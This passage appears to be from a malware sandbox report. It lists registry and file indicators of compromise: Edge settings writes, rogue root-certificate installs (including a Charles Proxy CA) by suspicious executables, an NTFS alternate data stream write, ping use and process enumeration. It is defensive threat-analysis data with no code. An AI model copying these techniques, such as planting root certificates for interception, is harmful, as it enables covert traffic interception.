Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 301bd569d72dd701 MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EL1681II-FO1F-AN2G-81K3-DNI5R86H5R6K}\1 = "25" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 010000008d8223401d8b1036eb6c3c6476d2cf28657f0031a2e41d0de2706777549895660ebe2a515277ff62a4c8e68dbb607132faf327c62c271572bcc859320f3189736a135079ca1811dbfe0434afc04cdc121c5178aa01afa63e0251b1486837830b0721283db18e4e9da6c1ff2e0eb5d6759937ee3df89bf623dbaa962d32ca56382d8867483cfaa63f0fa0808796ba987f0147a2cac00d4f28ea7588285d0a331d14e8f255ca7a323c4c3f9623287d907b5a1f9771cd247ad9185184b706170cc6cae05ea5e12f928e683f7808c01c175e906036ab160078d3fedd34ff7b1102dad412cc01563ad49fc540398e6bb98e1478abda5218c151937bbbb35052183c0ecd1dd8585cb96082afe2aaecc27255a6d19e2f48da86399d0c8a21b92d4c4a6f9ba1a6dfcdcd8580b0c5c0885d69032364dba09ddb71a5eeaae97fa701cd1f7aa23e02cbd1963ef68c89555ea7bc4b681200985324a1a2c5017a6c9a19bb7c06a39461967b35e07e6acff079358d4aabbcae89ab5d3626b369dc5de700367ef91e4349d609c891712c355585abfaabde438645030e50c20084e850e310104493239a4481f714 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658BE = 03000000010000001400000083da05a9886f7658be73acf0a4930c0f99b92f011400000001000000140000003656896549cb5b9b2f3cac4216504d91b933d79104000000010000001000000062455357dd57cb80c32ab295743cccc00f00000001000000200000006811c6215f18c75fdbe32cf56bd66248562a7fa3ba459cfee338745061e583941900000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d705c000000010000000400000000100000180000000100000010000000bb048f1838395f6fc3a1f3d2b7e976542000000001000000dc060000308206d8308204c0a003020102020a613fb718000000000004300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303131301e170d3131313031383232353531395a170d3236313031383233303531395a307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f66742053656375726520536572766572204341203230313130820222300d06092a864886f70d01010105000382020f003082020a0282020100d00bc0a4a81981e236e5e2aae5f3b2155875beb4e549f1e084f9bb0d64ef85c18155b8f3e7f16d40553dce8b6ad18493f5757c5ba4d47410ca32f323d3aeeecf9e0458c2d947cbd17c004148711b01671718afc6fe73037ee4ef439cef01712a1f81264377985457739d552bf09e8e7d060eac1b54f326f7f82308228b9e061d3738fd72d2cae563c19a5a7db26db352a96ee9aeb5fc8b36f99efaf61c581b9756a511e5b752dbbbe9f054bfb4ff2c6cb85d26cea00ad7df93ed7fddacf12c731ad9193755badd22788ea1d49b09f807223171b094aee0b0e726445790819715ce61ec65e24bf185521632f8b578aa7ecd4dec8321a4a89bbe9a6a04e0a31ccd56186cfd6b2f423ee237f272abd07873727bdeec0058e52130a3083a99ef9fc3f77a169665b5c381aff4397049aff6a9f66a0038f9b40819e01a35a55676225f6af269ae3ead58464db854f68941441e72b1bc122753d2c1ffb2cd50981eb5f4bbb6c28239d9ac1bf23b27846ab0c6260bd73a10e7b3db7cd356ac534c0bfa3b313774d8592bf9007919067bfd1c1d42d4410d2f050ed56b4923ffcfcdf87a82cfda3c2ddfe8d8120418ba1e8877b8981f1007bbc8057e0b09bf6bdde34e5bb0f9c784a63bca4c9f5b6229f7c7a2a89588702ce5c13f3c52234f409ac33185832fbf29f11d508f219607ceeff280c2447d9b62ef2fc37789ab454d533e0279d30203010001a382014b30820147301006092b06010401823715010403020100301d0603551d0e041604143656896549cb5b9b2f3cac4216504d91b933d791301906092b0601040182371402040c1e0a00530075006200430041300b0603551d0f040403020186300f0603551d130101ff040530030101ff301f0603551d23041830168014722d3a02319043b914054ee1eaa7c731d1238934305a0603551d1f04533051304fa04da04b8649687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f63726c2f70726f64756374732f4d6963526f6f436572417574323031315f323031315f30335f32322e63726c305e06082b0601050507010104523050304e06082b060105050730028642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f63657274732f4d6963526f6f436572417574323031315f323031315f30335f32322e637274300d06092a864886f70d01010b0500038202010041c861c1f55b9e3e9131f1b0c6bf0901b49db69074d709dba62e0d9fc8e7763446af0760894c81b33cd5f4123575c273a5f54d848ccba45dafbf92f617085742957265057679adeed1bab82e54a35107ac68eb210ce32581c2cd2af2c3ffcfc2bd49189ac7f084c5f914bc6b95e596efb342d253d54aa012c4ae12765309560e9df7d3a6498850f28a2c9720a2be4e78ef0565b74ba11688de31c70842247ca47b9e9dbc60005e6297e393fca7fe5b7b25dfe4537f4bbee63ef0db0179421c6e856c7db64430fba5379293b2a5ee20ad3f53d5c9f4286b57c1f81d6ab7562ab627811ca62d9fe7f4d0318397a82ab6acbe1b41f5e4895f56fbda5ad35e7d5594107e5357f44a3d402ac8bd679f84e110eefdda6b158249fc461dff4506749c4214edc539d3b3cd0b832790435192f24482ae6e9a1517b219fac7456c98017bbf37a9b088a492bc3838e01de47c97981a2e5fef3865b7352fbd7f4f21fac48cd26f06f94935eadf200f25aaea60ab2c1f4b89fcb7fa5c54904b3ea2284f6ce45265c1fd901c8582886ee9a655dd21287945b014e50acce65fc4bbdb6134699fac2638f7c1294108152e4ca0f7f90c3ede5fab08092d83acac348362f4c949428925b56eb247c5b339a0b1201b2cb18e046fa530491cd046e9405bf4ad6ebadb824a87124a80094ddbdf76b9055b1be0bb20705f0025c7d30efa16ad7b229e7108 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 099d917dfe37d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 90f29375fe37d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompletedV = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Lusonamana.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Lusonamana.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD mBDd5Qz6Fz.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 mBDd5Qz6Fz.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\ProgramData:ApplicationData 686A.exe File created C:\ProgramData:ApplicationData 686A.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2940 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1684 ultramediaburner.tmp 1684 ultramediaburner.tmp 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 